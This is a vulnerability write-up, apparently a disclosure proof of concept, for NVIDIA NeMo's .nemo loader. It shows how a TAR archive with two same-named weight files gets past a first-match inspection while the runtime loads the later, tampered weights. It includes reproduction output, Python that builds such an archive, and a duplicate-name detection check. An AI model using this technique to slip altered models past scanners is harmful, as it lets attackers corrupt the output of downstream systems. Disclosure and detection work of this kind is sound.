NeMo .nemo duplicate archive member — reader differential PoC

Vulnerability class: Model File Vulnerability (MFV) — archive member last-write differential
Target: NeMo – NVIDIA
Tested format: .nemo (TAR archive)

Summary

A .nemo model file is a TAR archive containing model_config.yaml and model_weights.ckpt. If the archive contains two entries named model_weights.ckpt, NeMo's restore path (SaveRestoreConnector._safe_extract) extracts all members in archive order and writes each one to the same output path, so the last member overwrites the first on disk. An archive inspection script that selects the first matching model_weights.ckpt member therefore sees the benign checkpoint, while the runtime loads the later, attacker-controlled member that extraction left on disk.

ModelScan 0.8.8 does not cover the .nemo format and reports SCAN_NOT_SUPPORTED with 0 issues for both the benign and crafted files.

Files

| File | Description |
|---|---|
| `benign.nemo` | Reference model: single `model_weights.ckpt` entry, identity weights |
| `dup_weights_last.nemo` | Crafted model: two `model_weights.ckpt` entries; the first is benign (identity), the second is malicious (99× scale + offset) |
| `reproduce.py` | Verifies the reader differential and output manipulation |
| `requirements.txt` | Python dependencies |

Reproduction

pip install -r requirements.txt
python reproduce.py

Expected output

NEMO_TAR_LAST_WRITE_WINS=True
FIRST_MATCH_SEES_BENIGN=True
EXTRACTED_FILE_IS_LAST=True
OUTPUT_FLIP_CONFIRMED=True
  first_match output  = [1.0, 2.0]  (benign, what first-match inspector sees)
  nemo_extract output = [198.0, 297.0]  (malicious, what sequential extraction writes)
  delta               = [197.0, 295.0]

MODELSCAN_RESULT=0 issues / SCAN_NOT_SUPPORTED

=== Archive member table (dup_weights_last.nemo) ===
  [0] model_config.yaml  (38 bytes)
  [1] model_weights.ckpt  (1829 bytes)
  [2] model_weights.ckpt  (1829 bytes)

=== Prediction table ===
Model                                Output
benign.nemo                      [1.0, 2.0]
dup_weights_last.nemo        [198.0, 297.0]  <- sequential extract, last wins

[PASS] All checks passed.

Mechanism

In dup_weights_last.nemo, the TAR archive contains two members named model_weights.ckpt:

Member [1] (index 0 among weight entries): benign identity weights {bias: [0, 0], scale: [1, 1]} — produces output [1.0, 2.0] for input [1, 2]
Member [2] (index 1 among weight entries): malicious 99× weights {bias: [99, 99], scale: [99, 99]} — produces output [198.0, 297.0] for the same input
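The two outputs can be checked by hand. The sketch below assumes the toy model applies an elementwise affine map, `scale * x + bias`; that form is inferred from the listed weights and outputs rather than taken from `reproduce.py`, and `apply_affine` is a hypothetical helper name.

```python
def apply_affine(weights, inputs):
    """Elementwise scale * x + bias (assumed form of the toy model)."""
    return [
        s * x + b
        for s, x, b in zip(weights["scale"], inputs, weights["bias"])
    ]


# Weight values copied from the two archive members described above.
benign = {"bias": [0.0, 0.0], "scale": [1.0, 1.0]}
malicious = {"bias": [99.0, 99.0], "scale": [99.0, 99.0]}
x = [1.0, 2.0]

benign_out = apply_affine(benign, x)        # [1.0, 2.0]
malicious_out = apply_affine(malicious, x)  # [198.0, 297.0]
delta = [m - b for m, b in zip(malicious_out, benign_out)]  # [197.0, 295.0]

print(benign_out, malicious_out, delta)
```

Under that assumption the numbers match the expected output: 99·1 + 99 = 198 and 99·2 + 99 = 297, giving a delta of [197.0, 295.0].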

NeMo's SaveRestoreConnector._safe_extract iterates tar.getmembers() in archive order and calls tar.extract(member, out_folder) for each member that passes the path-safety check. When two members share a name, the second call overwrites the file written by the first. The model is then loaded from os.path.join(tmpdir, 'model_weights.ckpt'), which now contains the attacker-supplied weights.

Source reference: nemo/core/connectors/save_restore_connector.py — _safe_extract, _unpack_nemo_file, load_config_and_state_dict
Permalink: https://github.com/NVIDIA/NeMo/blob/43707ab33d0b1b621dae87454fed9122a7022d28/nemo/core/connectors/save_restore_connector.py
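The overwrite can be reproduced without NeMo installed. The following is a minimal sketch using only Python's standard `tarfile` module; it is a stand-in for the extraction loop described above, not NeMo's code, and it omits the path-safety check. The archive name `dup_demo.nemo`, the helper names, and the placeholder payloads are all hypothetical.

```python
import io
import os
import tarfile
import tempfile


def add_member(tar, name, payload):
    """Append one in-memory file to an open tar archive."""
    info = tarfile.TarInfo(name=name)
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))


def build_archive(path):
    """Write a tar with two members that share the name model_weights.ckpt."""
    with tarfile.open(path, "w") as tar:
        add_member(tar, "model_config.yaml", b"placeholder: true\n")
        add_member(tar, "model_weights.ckpt", b"BENIGN")
        add_member(tar, "model_weights.ckpt", b"MALICIOUS")


def first_match_bytes(path, name):
    """Read the first member with the given name, without extracting."""
    with tarfile.open(path, "r") as tar:
        for member in tar.getmembers():
            if member.name == name:
                return tar.extractfile(member).read()
    return None


def sequential_extract_bytes(path, name):
    """Extract every member in archive order, then read the file left on disk."""
    with tempfile.TemporaryDirectory() as out_folder:
        with tarfile.open(path, "r") as tar:
            for member in tar.getmembers():
                tar.extract(member, out_folder)
        with open(os.path.join(out_folder, name), "rb") as fh:
            return fh.read()


with tempfile.TemporaryDirectory() as workdir:
    archive = os.path.join(workdir, "dup_demo.nemo")
    build_archive(archive)
    seen_by_inspector = first_match_bytes(archive, "model_weights.ckpt")
    seen_by_loader = sequential_extract_bytes(archive, "model_weights.ckpt")

print(seen_by_inspector, seen_by_loader)
```

The first-match reader returns the first payload, while the file on disk after sequential extraction holds the second. Recent Python versions may emit a deprecation warning for `tar.extract` without a `filter` argument; the overwrite behavior is the same either way.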

Reader comparison

| Reader | API | Resolution | Weights loaded |
|---|---|---|---|
| First-match archive inspection | `getmembers()` → first `model_weights.ckpt` entry | first match | identity (benign) |
| NeMo restore path (`_safe_extract`) | `tar.extract()` for each member in order | last write wins | 99× scale (malicious) |
| ModelScan 0.8.8 | `.scan()` | not scanned | 0 issues (SCAN_NOT_SUPPORTED) |
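Both readers disagree only when a member name repeats, so one way an inspector could surface the differential is to count names before picking an entry. This is a minimal sketch with the standard library, not part of `reproduce.py`, NeMo, or ModelScan; `duplicate_member_names` and `make_tar` are hypothetical helpers, and the archives are built in memory for illustration.

```python
import io
import tarfile
from collections import Counter


def duplicate_member_names(fileobj):
    """Return {name: count} for member names that appear more than once."""
    with tarfile.open(fileobj=fileobj, mode="r") as tar:
        counts = Counter(member.name for member in tar.getmembers())
    return {name: n for name, n in counts.items() if n > 1}


def make_tar(names):
    """Build an in-memory tar holding one tiny placeholder file per name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in names:
            payload = b"x"
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    buf.seek(0)
    return buf


crafted = make_tar(["model_config.yaml", "model_weights.ckpt", "model_weights.ckpt"])
clean = make_tar(["model_config.yaml", "model_weights.ckpt"])

crafted_dups = duplicate_member_names(crafted)
clean_dups = duplicate_member_names(clean)

print(crafted_dups)  # {'model_weights.ckpt': 2}
print(clean_dups)    # {}
```

The check compares raw member names only. Names that differ textually but resolve to the same output path (for example with a leading `./`) would need normalization first, which this sketch does not attempt.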
